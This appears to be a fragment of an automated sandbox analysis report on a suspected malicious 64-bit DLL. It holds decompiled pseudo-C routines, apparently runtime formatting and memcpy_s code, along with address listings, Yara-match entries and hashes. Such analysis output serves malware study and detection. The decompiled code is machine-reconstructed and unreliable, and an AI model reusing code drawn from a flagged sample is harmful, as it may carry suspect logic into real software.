                                                                      				 *(_t1045 + 0x4e4 + _t1029 * 4) = _t680;
                                                                      				r15d =  *(_t1045 + 0x4e0);
                                                                      				r11d = _t680;
                                                                      				if (_t680 != 0) goto 0x8004dbec;
                                                                      				if (r8d == 0x73) goto 0x8004dadc;
                                                                      				r9d = r9d + 1;
                                                                      				if (r9d != r13d) goto 0x8004db45;
                                                                      				r8d = r15d;
                                                                      				_t1080 = _t1079 << 2;
                                                                      				 *(_t1048 + 0x70) = r15d;
                                                                      				if (_t1080 == 0) goto 0x8004dca6;
                                                                      				_t890 = _t1080 - 0xffffffff;
                                                                      				if (_t890 > 0) goto 0x8004dc87;
                                                                      				_t1031 = _t1045 + 0x4e4;
                                                                      				E00000001180003FF0();
                                                                      				goto 0x8004dca1;
                                                                      				E000000011800046A0(0x1cc, 0, _t1048 + 0x74, _t1031, 0xffffffff);
                                                                      				E00000001180013B18(0xffffffff);
                                                                      				 *0xffffffff = 0x22;
                                                                      				E00000001180013928();
                                                                      				r15d =  *(_t1048 + 0x70);
                                                                      				 *(_t1048 + 0x24) =  *(_t1048 + 0x24) -  *(_t1048 + 0x34);
                                                                      				if (_t890 != 0) goto 0x8004d92a;
                                                                      				if (_t890 == 0) goto 0x8004dd45;
                                                                      				_t601 =  *0x40000180063564;
                                                                      				if (_t601 == 0) goto 0x8004dadc;
                                                                      				if (_t601 == 1) goto 0x8004dd45;
                                                                      				if (r15d == 0) goto 0x8004dd45;
                                                                      				r8d = r14d;
                                                                      				r9d = r14d;
                                                                      				r10d = _t601;
                                                                      				r9d = r9d + 1;
                                                                      				if (r9d != r15d) goto 0x8004dcfb;
                                                                      				if (r8d == 0) goto 0x8004dd9a;
                                                                      				if ( *(_t1048 + 0x70) - 0x73 >= 0) goto 0x8004dadc;
                                                                      				 *(_t1048 + 0x40000000000070) = r8d;
                                                                      				r15d =  *(_t1048 + 0x70);
                                                                      				r15d = r15d + 1;
                                                                      				 *(_t1048 + 0x70) = r15d;
                                                                      				_t1042 =  *((intOrPtr*)(_t1048 + 0x48));
                                                                      				if (r15d == 0) goto 0x8004ddc6;
                                                                      				r8d = r14d;
                                                                      				r9d = r14d;
                                                                      				r9d = r9d + 1;
                                                                      				 *(_t1048 + 0x74 + _t1031 * 4) = r8d;
                                                                      				if (r9d != r15d) goto 0x8004dd5c;
                                                                      				if (r8d == 0) goto 0x8004ddc6;
                                                                      				if ( *(_t1048 + 0x70) - 0x73 >= 0) goto 0x8004dda1;
                                                                      				 *(_t1048 + 0x40000000000070) = r8d;
                                                                      				 *(_t1048 + 0x70) =  *(_t1048 + 0x70) + 1;
                                                                      				goto 0x8004ddc6;
                                                                      				r15d =  *(_t1048 + 0x70);
                                                                      				goto 0x8004dd45;
                                                                      				r9d = 0;
                                                                      				 *(_t1045 + 0x310) = r14d;
                                                                      				 *(_t1048 + 0x70) = r14d;
                                                                      				E0000000118005053C(0xffffffff, _t1042, _t1048 + 0x74, _t1031, _t1042, _t1045 + 0x314, _t1094, _t1114);
                                                                      				_t1032 = _t1045 + 0x140;
                                                                      				_t608 = E0000000118004E1C0( *(_t1048 + 0x74 + _t1031 * 4), 0xffffffff, _t1048 + 0x70, _t1032, _t1094, _t949, 0x180000000, _t1112, _t1106);
                                                                      				r13b = 0x30;
                                                                      				if (_t608 != 0xa) goto 0x8004de73;
                                                                      				 *_t1042 = 0x31;
                                                                      				if (r12d == 0) goto 0x8004de84;
                                                                      				r8d = r14d;
                                                                      				r9d = r14d;
                                                                      				r9d = r9d + 1;
                                                                      				 *(_t1045 + 0x144 + _t1032 * 4) = r8d;
                                                                      				if (r9d != r12d) goto 0x8004ddfb;
                                                                      				if (r8d == 0) goto 0x8004de84;
                                                                      				if ( *(_t1045 + 0x140) - 0x73 >= 0) goto 0x8004de48;
                                                                      				 *(_t1045 + 0x40000000000140) = r8d;
                                                                      				 *(_t1045 + 0x140) =  *(_t1045 + 0x140) + 1;
                                                                      				goto 0x8004de84;
                                                                      				r9d = 0;
                                                                      				 *(_t1045 + 0x310) = r14d;
                                                                      				 *(_t1045 + 0x140) = r14d;
                                                                      				_t612 = E0000000118005053C(0xffffffff, _t1042 + 1, _t1045 + 0x144, _t1032, _t1042, _t1045 + 0x314, _t1094, _t1104);
                                                                      				goto 0x8004de84;
                                                                      				if (_t612 != 0) goto 0x8004de7b;
                                                                      				_t760 =  *(_t1048 + 0x20) + 1 - 1;
                                                                      				goto 0x8004de84;
                                                                      				_t953 = _t1042 + 1;
                                                                      				 *_t1042 = 1;
                                                                      				_t685 =  *((intOrPtr*)(_t1048 + 0x40));
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t1048 + 0x58)))) = _t760;
                                                                      				if (_t760 < 0) goto 0x8004dea4;
                                                                      				if (_t685 - 0x7fffffff > 0) goto 0x8004dea4;
                                                                      				if ( *(_t1048 + 0x44) != r14d) goto 0x8004dea4;
                                                                      				_t686 = _t685 + _t760;
                                                                      				_t934 =  *((intOrPtr*)(_t1048 + 0x60)) - 1;
                                                                      				_t1035 =  <  ? _t934 : _t1034;
                                                                      				_t1036 = ( <  ? _t934 : _t1034) + _t1042;
                                                                      				sil = r14b;
                                                                      				if (_t953 == _t1036) goto 0x8004dfbd;
                                                                      				r15d = 9;
                                                                      				r9d =  *(_t1048 + 0x70);
                                                                      				if (r9d == 0) goto 0x8004dfc2;
                                                                      				r8d = r14d;
                                                                      				r10d = r14d;
                                                                      				r10d = r10d + 1;
                                                                      				 *(_t1048 + 0x74 + _t1032 * 4) = _t686;
                                                                      				if (r10d != r9d) goto 0x8004dede;
                                                                      				if (r8d == 0) goto 0x8004df45;
                                                                      				if ( *(_t1048 + 0x70) - 0x73 >= 0) goto 0x8004df20;
                                                                      				 *(_t1048 + 0x74 + _t934 * 4) = r8d;
                                                                      				 *(_t1048 + 0x70) =  *(_t1048 + 0x70) + 1;
                                                                      				goto 0x8004df45;
                                                                      				r9d = 0;
                                                                      				 *(_t1045 + 0x310) = r14d;
                                                                      				 *(_t1048 + 0x70) = r14d;
                                                                      				E0000000118005053C(_t934, _t953, _t1048 + 0x74, _t1032, _t1042, _t1045 + 0x314, _t1094, _t1034);
                                                                      				_t1033 = _t1045 + 0x140;
                                                                      				_t1002 = _t1048 + 0x70;
                                                                      				E0000000118004E1C0(_t686, _t934, _t1002, _t1033, _t1094, _t949, 0x180000000, _t1038, _t1044);
                                                                      				r10d = _t686;
                                                                      				r10d = r10d -  ~r9d;
                                                                      				r9d = 8;
                                                                      				r8b = r8b - _t1002 + _t1033 + _t1002 + _t1033;
                                                                      				_t689 = _t934 + 0x180000000;
                                                                      				r8d = 0xcccccccd * r8d >> 0x20 >> 3;
                                                                      				if (r10d - r9d > 0) goto 0x8004df93;
                                                                      				if (_t689 == r13b) goto 0x8004df99;
                                                                      				sil = 1;
                                                                      				goto 0x8004df99;
                                                                      				 *((char*)(_t934 + _t953)) = _t689;
                                                                      				_t624 = r9d | 0xffffffff;
                                                                      				r9d = r9d + _t624;
                                                                      				if (r9d != _t624) goto 0x8004df65;
                                                                      				_t936 = _t1036 - _t953;
                                                                      				_t937 =  >  ? _t1114 : _t936;
                                                                      				_t954 = _t953 + ( >  ? _t1114 : _t936);
                                                                      				if (_t954 != _t1036) goto 0x8004deca;
                                                                      				r9d =  *(_t1048 + 0x70);
                                                                      				 *_t954 = r14b;
                                                                      				if (r9d != 0) goto 0x8004dfd5;
                                                                      				if (sil != 0) goto 0x8004dfd5;
                                                                      				goto 0x8004dfd7;
                                                                      				return E000000011800028F0(0, _t689,  *(_t1045 + 0x6b0) ^ _t1048);
                                                                      			}























































































                                                                      0x18004cec8
                                                                      0x18004cec8
                                                                      0x18004cec8
                                                                      0x18004ced8
                                                                      0x18004cee0
                                                                      0x18004cee7
                                                                      0x18004cef1
                                                                      0x18004cf04
                                                                      0x18004cf10
                                                                      0x18004cf15
                                                                      0x18004cf1a
                                                                      0x18004cf1e
                                                                      0x18004cf24
                                                                      0x18004cf2c
                                                                      0x18004cf35
                                                                      0x18004cf51
                                                                      0x18004cf61
                                                                      0x18004cf67
                                                                      0x18004cf6a
                                                                      0x18004cf6c
                                                                      0x18004cf75
                                                                      0x18004cf7a
                                                                      0x18004cf7f
                                                                      0x18004cf83
                                                                      0x18004cf87
                                                                      0x18004cf87
                                                                      0x18004cf96
                                                                      0x18004cf9d
                                                                      0x18004cfa0
                                                                      0x18004cfa6
                                                                      0x18004cfad
                                                                      0x18004cfaf
                                                                      0x18004cfb4
                                                                      0x18004cfb7
                                                                      0x18004cfc1
                                                                      0x18004cfc9
                                                                      0x18004cfd3
                                                                      0x18004cfd9
                                                                      0x18004cfe1
                                                                      0x18004cfe7
                                                                      0x18004cff8
                                                                      0x18004cffe
                                                                      0x18004d001
                                                                      0x18004d004
                                                                      0x18004d006
                                                                      0x18004d00d
                                                                      0x18004d018
                                                                      0x18004d01b
                                                                      0x18004d021
                                                                      0x18004d025
                                                                      0x18004d034
                                                                      0x18004d037
                                                                      0x18004d03c
                                                                      0x18004d03f
                                                                      0x18004d042
                                                                      0x18004d046
                                                                      0x18004d04b
                                                                      0x18004d055
                                                                      0x18004d05e
                                                                      0x18004d061
                                                                      0x18004d065
                                                                      0x18004d068
                                                                      0x18004d06f
                                                                      0x18004d071
                                                                      0x18004d075
                                                                      0x18004d075
                                                                      0x18004d07c
                                                                      0x18004d089
                                                                      0x18004d08b
                                                                      0x18004d090
                                                                      0x18004d092
                                                                      0x18004d097
                                                                      0x18004d09d
                                                                      0x18004d0a9
                                                                      0x18004d0af
                                                                      0x18004d0b5
                                                                      0x18004d0ba
                                                                      0x18004d0c0
                                                                      0x18004d0c2
                                                                      0x18004d0c6
                                                                      0x18004d0ce
                                                                      0x18004d0d4
                                                                      0x18004d0d9
                                                                      0x18004d0dc
                                                                      0x18004d0de
                                                                      0x18004d0e3
                                                                      0x18004d0e5
                                                                      0x18004d0e8
                                                                      0x18004d0ed
                                                                      0x18004d0f3
                                                                      0x18004d0fd
                                                                      0x18004d104
                                                                      0x18004d109
                                                                      0x18004d110
                                                                      0x18004d11b
                                                                      0x18004d11e
                                                                      0x18004d124
                                                                      0x18004d128
                                                                      0x18004d12f
                                                                      0x18004d137
                                                                      0x18004d13a
                                                                      0x18004d13f
                                                                      0x18004d142
                                                                      0x18004d145
                                                                      0x18004d149
                                                                      0x18004d14e
                                                                      0x18004d158
                                                                      0x18004d161
                                                                      0x18004d164
                                                                      0x18004d168
                                                                      0x18004d16b
                                                                      0x18004d172
                                                                      0x18004d174
                                                                      0x18004d178
                                                                      0x18004d178
                                                                      0x18004d17f
                                                                      0x18004d18c
                                                                      0x18004d18e
                                                                      0x18004d193
                                                                      0x18004d195
                                                                      0x18004d19a
                                                                      0x18004d1a0
                                                                      0x18004d1ac
                                                                      0x18004d1b2
                                                                      0x18004d1b8
                                                                      0x18004d1bd
                                                                      0x18004d1c3
                                                                      0x18004d1c5
                                                                      0x18004d1c9
                                                                      0x18004d1d1
                                                                      0x18004d1d7
                                                                      0x18004d1df
                                                                      0x18004d1e1
                                                                      0x18004d1eb
                                                                      0x18004d1ed
                                                                      0x18004d1f0
                                                                      0x18004d1f5
                                                                      0x18004d1fb
                                                                      0x18004d201
                                                                      0x18004d208
                                                                      0x18004d210
                                                                      0x18004d218
                                                                      0x18004d222
                                                                      0x18004d228
                                                                      0x18004d230
                                                                      0x18004d236
                                                                      0x18004d247
                                                                      0x18004d24d
                                                                      0x18004d250
                                                                      0x18004d253
                                                                      0x18004d255
                                                                      0x18004d258
                                                                      0x18004d25d
                                                                      0x18004d261
                                                                      0x18004d266
                                                                      0x18004d269
                                                                      0x18004d26f
                                                                      0x18004d275
                                                                      0x18004d279
                                                                      0x18004d27d
                                                                      0x18004d284
                                                                      0x18004d286
                                                                      0x18004d289
                                                                      0x18004d28e
                                                                      0x18004d290
                                                                      0x18004d290
                                                                      0x18004d297
                                                                      0x18004d299
                                                                      0x18004d29c
                                                                      0x18004d2a2
                                                                      0x18004d2a4
                                                                      0x18004d2a9
                                                                      0x18004d2ab
                                                                      0x18004d2b1
                                                                      0x18004d2b8
                                                                      0x18004d2cd
                                                                      0x18004d2d5
                                                                      0x18004d2db
                                                                      0x18004d2dd
                                                                      0x18004d2f7
                                                                      0x18004d2ff
                                                                      0x18004d302
                                                                      0x18004d312
                                                                      0x18004d319
                                                                      0x18004d319
                                                                      0x18004d31d
                                                                      0x18004d320
                                                                      0x18004d324
                                                                      0x18004d32b
                                                                      0x18004d335
                                                                      0x18004d347
                                                                      0x18004d34a
                                                                      0x18004d357
                                                                      0x18004d35c
                                                                      0x18004d363
                                                                      0x18004d368
                                                                      0x18004d36e
                                                                      0x18004d373
                                                                      0x18004d377
                                                                      0x18004d37c
                                                                      0x18004d37f
                                                                      0x18004d385
                                                                      0x18004d38b
                                                                      0x18004d38f
                                                                      0x18004d393
                                                                      0x18004d39a
                                                                      0x18004d39c
                                                                      0x18004d39f
                                                                      0x18004d3a4
                                                                      0x18004d3a6
                                                                      0x18004d3a6
                                                                      0x18004d3ad
                                                                      0x18004d3af
                                                                      0x18004d3b2
                                                                      0x18004d3b8
                                                                      0x18004d3ba
                                                                      0x18004d3bf
                                                                      0x18004d3c1
                                                                      0x18004d3c7
                                                                      0x18004d3ce
                                                                      0x18004d3df
                                                                      0x18004d3e7
                                                                      0x18004d3ed
                                                                      0x18004d3ef
                                                                      0x18004d3f9
                                                                      0x18004d409
                                                                      0x18004d414
                                                                      0x18004d424
                                                                      0x18004d42b
                                                                      0x18004d435
                                                                      0x18004d43a
                                                                      0x18004d43f
                                                                      0x18004d445
                                                                      0x18004d44a
                                                                      0x18004d459
                                                                      0x18004d46b
                                                                      0x18004d46e
                                                                      0x18004d474
                                                                      0x18004d47a
                                                                      0x18004d489
                                                                      0x18004d48e
                                                                      0x18004d4a8
                                                                      0x18004d4bd
                                                                      0x18004d4c3
                                                                      0x18004d4ed
                                                                      0x18004d4f2
                                                                      0x18004d4fd
                                                                      0x18004d4ff
                                                                      0x18004d507
                                                                      0x18004d509
                                                                      0x18004d50c
                                                                      0x18004d513
                                                                      0x18004d51b
                                                                      0x18004d524
                                                                      0x18004d52a
                                                                      0x18004d52d
                                                                      0x18004d536
                                                                      0x18004d55b
                                                                      0x18004d55d
                                                                      0x18004d566
                                                                      0x18004d56c
                                                                      0x18004d579
                                                                      0x18004d57c
                                                                      0x18004d586
                                                                      0x18004d597
                                                                      0x18004d599
                                                                      0x18004d5a0
                                                                      0x18004d5a5
                                                                      0x18004d5ac
                                                                      0x18004d5b1
                                                                      0x18004d5b6
                                                                      0x18004d5bc
                                                                      0x18004d5c1
                                                                      0x18004d5ca
                                                                      0x18004d5d3
                                                                      0x18004d5d8
                                                                      0x18004d5da
                                                                      0x18004d5dd
                                                                      0x18004d5e6
                                                                      0x18004d60b
                                                                      0x18004d610
                                                                      0x18004d619
                                                                      0x18004d621
                                                                      0x18004d629
                                                                      0x18004d630
                                                                      0x18004d633
                                                                      0x18004d63a
                                                                      0x18004d63f
                                                                      0x18004d646
                                                                      0x18004d649
                                                                      0x18004d64b
                                                                      0x18004d656
                                                                      0x18004d660
                                                                      0x18004d663
                                                                      0x18004d66a
                                                                      0x18004d672
                                                                      0x18004d680
                                                                      0x18004d683
                                                                      0x18004d68e
                                                                      0x18004d692
                                                                      0x18004d69c
                                                                      0x18004d6a8
                                                                      0x18004d6ab
                                                                      0x18004d6b1
                                                                      0x18004d6b6
                                                                      0x18004d6ba
                                                                      0x18004d6c0
                                                                      0x18004d6ce
                                                                      0x18004d6d3
                                                                      0x18004d6d9
                                                                      0x18004d6d9
                                                                      0x18004d6dd
                                                                      0x18004d6e5
                                                                      0x18004d6ec
                                                                      0x18004d6f1
                                                                      0x18004d6f4
                                                                      0x18004d6fa
                                                                      0x18004d709
                                                                      0x18004d711
                                                                      0x18004d713
                                                                      0x18004d717
                                                                      0x18004d71f
                                                                      0x18004d729
                                                                      0x18004d74a
                                                                      0x18004d751
                                                                      0x18004d75f
                                                                      0x18004d761
                                                                      0x18004d766
                                                                      0x18004d76b
                                                                      0x18004d771
                                                                      0x18004d77d
                                                                      0x18004d77f
                                                                      0x18004d783
                                                                      0x18004d78b
                                                                      0x18004d798
                                                                      0x18004d79b
                                                                      0x18004d7a1
                                                                      0x18004d7a8
                                                                      0x18004d7b3
                                                                      0x18004d7b8
                                                                      0x18004d7be
                                                                      0x18004d7ce
                                                                      0x18004d7d4
                                                                      0x18004d7da
                                                                      0x18004d7dd
                                                                      0x18004d7e1
                                                                      0x18004d7eb
                                                                      0x18004d7f2
                                                                      0x18004d7f9
                                                                      0x18004d7fc
                                                                      0x18004d7fe
                                                                      0x18004d805
                                                                      0x18004d80a
                                                                      0x18004d811
                                                                      0x18004d816
                                                                      0x18004d81b
                                                                      0x18004d821
                                                                      0x18004d826
                                                                      0x18004d841
                                                                      0x18004d845
                                                                      0x18004d85c
                                                                      0x18004d865
                                                                      0x18004d86f
                                                                      0x18004d878
                                                                      0x18004d881
                                                                      0x18004d887
                                                                      0x18004d88a
                                                                      0x18004d88d
                                                                      0x18004d893
                                                                      0x18004d8a4
                                                                      0x18004d8b8
                                                                      0x18004d8bd
                                                                      0x18004d8c6
                                                                      0x18004d8d2
                                                                      0x18004d8da
                                                                      0x18004d8e1
                                                                      0x18004d8e4
                                                                      0x18004d8eb
                                                                      0x18004d8f0
                                                                      0x18004d8f7
                                                                      0x18004d906
                                                                      0x18004d90a
                                                                      0x18004d910
                                                                      0x18004d913
                                                                      0x18004d919
                                                                      0x18004d91f
                                                                      0x18004d92e
                                                                      0x18004d933
                                                                      0x18004d94d
                                                                      0x18004d962
                                                                      0x18004d968
                                                                      0x18004d992
                                                                      0x18004d997
                                                                      0x18004d9a2
                                                                      0x18004d9a4
                                                                      0x18004d9ac
                                                                      0x18004d9ae
                                                                      0x18004d9b1
                                                                      0x18004d9b6
                                                                      0x18004d9be
                                                                      0x18004d9c7
                                                                      0x18004d9cd
                                                                      0x18004d9d0
                                                                      0x18004d9d9
                                                                      0x18004d9f8
                                                                      0x18004d9fa
                                                                      0x18004da03
                                                                      0x18004da09
                                                                      0x18004da14
                                                                      0x18004da17
                                                                      0x18004da1f
                                                                      0x18004da2e
                                                                      0x18004da30
                                                                      0x18004da37
                                                                      0x18004da3c
                                                                      0x18004da43
                                                                      0x18004da48
                                                                      0x18004da4d
                                                                      0x18004da53
                                                                      0x18004da58
                                                                      0x18004da5f
                                                                      0x18004da68
                                                                      0x18004da6d
                                                                      0x18004da6f
                                                                      0x18004da72
                                                                      0x18004da7b
                                                                      0x18004da9a
                                                                      0x18004da9f
                                                                      0x18004daa6
                                                                      0x18004daac
                                                                      0x18004dab1
                                                                      0x18004dab6
                                                                      0x18004dab9
                                                                      0x18004dabe
                                                                      0x18004dac3
                                                                      0x18004dac8
                                                                      0x18004dacb
                                                                      0x18004dacd
                                                                      0x18004dad6
                                                                      0x18004dae8
                                                                      0x18004daed
                                                                      0x18004daf5
                                                                      0x18004db01
                                                                      0x18004db04
                                                                      0x18004db0f
                                                                      0x18004db13
                                                                      0x18004db1d
                                                                      0x18004db27
                                                                      0x18004db2a
                                                                      0x18004db30
                                                                      0x18004db35
                                                                      0x18004db39
                                                                      0x18004db3f
                                                                      0x18004db4d
                                                                      0x18004db52
                                                                      0x18004db58
                                                                      0x18004db58
                                                                      0x18004db5c
                                                                      0x18004db64
                                                                      0x18004db6b
                                                                      0x18004db70
                                                                      0x18004db73
                                                                      0x18004db79
                                                                      0x18004db88
                                                                      0x18004db90
                                                                      0x18004db92
                                                                      0x18004db96
                                                                      0x18004db9e
                                                                      0x18004dba8
                                                                      0x18004dbc9
                                                                      0x18004dbd0
                                                                      0x18004dbde
                                                                      0x18004dbe0
                                                                      0x18004dbe5
                                                                      0x18004dbea
                                                                      0x18004dbf0
                                                                      0x18004dbfc
                                                                      0x18004dbfe
                                                                      0x18004dc02
                                                                      0x18004dc0a
                                                                      0x18004dc17
                                                                      0x18004dc1a
                                                                      0x18004dc20
                                                                      0x18004dc27
                                                                      0x18004dc32
                                                                      0x18004dc37
                                                                      0x18004dc3d
                                                                      0x18004dc4d
                                                                      0x18004dc53
                                                                      0x18004dc59
                                                                      0x18004dc5c
                                                                      0x18004dc60
                                                                      0x18004dc68
                                                                      0x18004dc74
                                                                      0x18004dc77
                                                                      0x18004dc79
                                                                      0x18004dc80
                                                                      0x18004dc85
                                                                      0x18004dc8c
                                                                      0x18004dc91
                                                                      0x18004dc96
                                                                      0x18004dc9c
                                                                      0x18004dca1
                                                                      0x18004dcba
                                                                      0x18004dcbe
                                                                      0x18004dcd3
                                                                      0x18004dcd8
                                                                      0x18004dce2
                                                                      0x18004dceb
                                                                      0x18004dcf0
                                                                      0x18004dcf2
                                                                      0x18004dcf5
                                                                      0x18004dcf8
                                                                      0x18004dcfe
                                                                      0x18004dd1d
                                                                      0x18004dd22
                                                                      0x18004dd29
                                                                      0x18004dd33
                                                                      0x18004dd38
                                                                      0x18004dd3d
                                                                      0x18004dd40
                                                                      0x18004dd49
                                                                      0x18004dd54
                                                                      0x18004dd56
                                                                      0x18004dd59
                                                                      0x18004dd5f
                                                                      0x18004dd71
                                                                      0x18004dd7d
                                                                      0x18004dd82
                                                                      0x18004dd89
                                                                      0x18004dd8f
                                                                      0x18004dd94
                                                                      0x18004dd98
                                                                      0x18004dd9a
                                                                      0x18004dd9f
                                                                      0x18004dda1
                                                                      0x18004dda4
                                                                      0x18004ddb2
                                                                      0x18004ddc1
                                                                      0x18004ddc6
                                                                      0x18004ddd2
                                                                      0x18004ddd7
                                                                      0x18004dddd
                                                                      0x18004dde5
                                                                      0x18004ddef
                                                                      0x18004ddf5
                                                                      0x18004ddf8
                                                                      0x18004ddfe
                                                                      0x18004de13
                                                                      0x18004de22
                                                                      0x18004de27
                                                                      0x18004de30
                                                                      0x18004de38
                                                                      0x18004de40
                                                                      0x18004de46
                                                                      0x18004de48
                                                                      0x18004de4b
                                                                      0x18004de59
                                                                      0x18004de6c
                                                                      0x18004de71
                                                                      0x18004de75
                                                                      0x18004de77
                                                                      0x18004de79
                                                                      0x18004de7e
                                                                      0x18004de82
                                                                      0x18004de89
                                                                      0x18004de8d
                                                                      0x18004de91
                                                                      0x18004de99
                                                                      0x18004dea0
                                                                      0x18004dea2
                                                                      0x18004dea9
                                                                      0x18004deb1
                                                                      0x18004deb5
                                                                      0x18004deb8
                                                                      0x18004debe
                                                                      0x18004dec4
                                                                      0x18004deca
                                                                      0x18004ded2
                                                                      0x18004ded8
                                                                      0x18004dedb
                                                                      0x18004dee1
                                                                      0x18004def8
                                                                      0x18004df03
                                                                      0x18004df08
                                                                      0x18004df0f
                                                                      0x18004df15
                                                                      0x18004df1a
                                                                      0x18004df1e
                                                                      0x18004df20
                                                                      0x18004df23
                                                                      0x18004df31
                                                                      0x18004df40
                                                                      0x18004df45
                                                                      0x18004df4c
                                                                      0x18004df51
                                                                      0x18004df56
                                                                      0x18004df5c
                                                                      0x18004df5f
                                                                      0x18004df7a
                                                                      0x18004df7d
                                                                      0x18004df81
                                                                      0x18004df87
                                                                      0x18004df8c
                                                                      0x18004df8e
                                                                      0x18004df91
                                                                      0x18004df96
                                                                      0x18004df99
                                                                      0x18004df9c
                                                                      0x18004dfa2
                                                                      0x18004dfa7
                                                                      0x18004dfad
                                                                      0x18004dfb1
                                                                      0x18004dfb7
                                                                      0x18004dfbd
                                                                      0x18004dfc2
                                                                      0x18004dfc8
                                                                      0x18004dfcd
                                                                      0x18004dfd3
                                                                      0x18004e000

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfomemcpy_s
                                                                      • String ID: s
                                                                      • API String ID: 1759834784-453955339
                                                                      • Opcode ID: 091bf0aaddba807e11e26974d496c7dd70f41b9b4737f528018e5087ffde1a81
                                                                      • Instruction ID: 32aa0032ce6252a5929b45d789271142be84ca4526266c0580a2d86bf78e9e84
                                                                      • Opcode Fuzzy Hash: 091bf0aaddba807e11e26974d496c7dd70f41b9b4737f528018e5087ffde1a81
                                                                      • Instruction Fuzzy Hash: 0CA2D0B261458C8BE7B68E29E5807DD7791F39C7CCF519116EB0667B98DB38CB088B04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "u$7]$>Q$?#$Sr$Uk$f#$r)$%$H$Q$W
                                                                      • API String ID: 0-4243515851
                                                                      • Opcode ID: 492d834b9a837f3b806bd78a47173ec54b06c2d2ef030b8ce1e64167c5227f6f
                                                                      • Instruction ID: 75fb4df1fcad5c182adcb23b4de4e4c60881d0c2f12d3085979b08ea433fae7a
                                                                      • Opcode Fuzzy Hash: 492d834b9a837f3b806bd78a47173ec54b06c2d2ef030b8ce1e64167c5227f6f
                                                                      • Instruction Fuzzy Hash: 8072F370908B448FE768CF39C59955EBBF1FB84744F204A2DE6A2872B1DB749846CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E0000000118004EBA0(signed int __edx, long long __rbx, signed int __rcx) {
                                                                      				void* __rsi;
                                                                      				unsigned int _t127;
                                                                      				void* _t142;
                                                                      				void* _t168;
                                                                      				unsigned int _t175;
                                                                      				unsigned int _t184;
                                                                      				unsigned int _t195;
                                                                      				intOrPtr _t199;
                                                                      				unsigned int _t201;
                                                                      				void* _t219;
                                                                      				signed long long _t237;
                                                                      				signed long long _t238;
                                                                      				signed long long _t241;
                                                                      				signed long long _t254;
                                                                      				signed long long _t262;
                                                                      				signed long long _t268;
                                                                      				void* _t274;
                                                                      				signed long long _t276;
                                                                      				signed long long _t278;
                                                                      				void* _t281;
                                                                      				void* _t282;
                                                                      				void* _t284;
                                                                      				signed long long _t285;
                                                                      				signed long long _t297;
                                                                      				signed long long _t300;
                                                                      				void* _t304;
                                                                      				signed long long _t306;
                                                                      				signed long long _t311;
                                                                      				void* _t312;
                                                                      				void* _t316;
                                                                      				void* _t318;
                                                                      				void* _t321;
                                                                      				signed long long _t322;
                                                                      
                                                                      				 *((long long*)(_t284 + 0x18)) = __rbx;
                                                                      				_t282 = _t284 - 0x4c0;
                                                                      				_t285 = _t284 - 0x5c0;
                                                                      				_t237 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_t238 = _t237 ^ _t285;
                                                                      				 *(_t282 + 0x4b0) = _t238;
                                                                      				r8d = __edx;
                                                                      				 *(_t285 + 0x2c) = __edx;
                                                                      				r12d = 0;
                                                                      				_t127 = 0xcccccccd * __edx >> 0x20 >> 3;
                                                                      				 *(_t285 + 0x28) = _t127;
                                                                      				r15d = _t127;
                                                                      				 *(_t285 + 0x20) = _t127;
                                                                      				if (_t127 == 0) goto 0x8004f020;
                                                                      				r13d = r15d;
                                                                      				r13d =  >  ? 0x26 : r13d;
                                                                      				 *(_t285 + 0x24) = r13d;
                                                                      				_t276 = 0x634d0 + _t238 * 4 + 0x180000000;
                                                                      				 *(_t282 + 0x2e0) = _t278 + __rcx;
                                                                      				E000000011800046A0(_t278 + __rcx, 0, _t282 + 0x2e4, 0x180000000, __rcx * 4);
                                                                      				_t279 = _t278 << 2;
                                                                      				_t262 = 0x180062bc0 + _t238 * 4;
                                                                      				E00000001180003FF0();
                                                                      				if ( *(_t282 + 0x2e0) - 1 > 0) goto 0x8004ed58;
                                                                      				if ( *((intOrPtr*)(_t282 + 0x2e4)) != 0) goto 0x8004ecc6;
                                                                      				 *(_t282 + 0x110) = r12d;
                                                                      				r9d = 0;
                                                                      				 *__rcx = r12d;
                                                                      				E0000000118005053C(_t238, __rcx * 4, __rcx + 4, _t262, _t278 << 2, _t282 + 0x114, _t304, _t321);
                                                                      				goto 0x8004efee;
                                                                      				if (1 == 1) goto 0x8004efee;
                                                                      				r10d =  *__rcx;
                                                                      				if (r10d != 0) goto 0x8004ecde;
                                                                      				goto 0x8004efee;
                                                                      				r8d = r12d;
                                                                      				r9d = r12d;
                                                                      				_t241 = _t238;
                                                                      				r9d = r9d + 1;
                                                                      				_t264 = _t262 * _t241 + _t238;
                                                                      				if (r9d != r10d) goto 0x8004ecf0;
                                                                      				if (r8d == 0) goto 0x8004ecbf;
                                                                      				if ( *__rcx - 0x73 >= 0) goto 0x8004ed32;
                                                                      				 *(__rcx + 4 + _t238 * 4) = r8d;
                                                                      				 *__rcx =  *__rcx + 1;
                                                                      				goto 0x8004efee;
                                                                      				r9d = 0;
                                                                      				 *(_t282 + 0x2e0) = r12d;
                                                                      				 *__rcx = r12d;
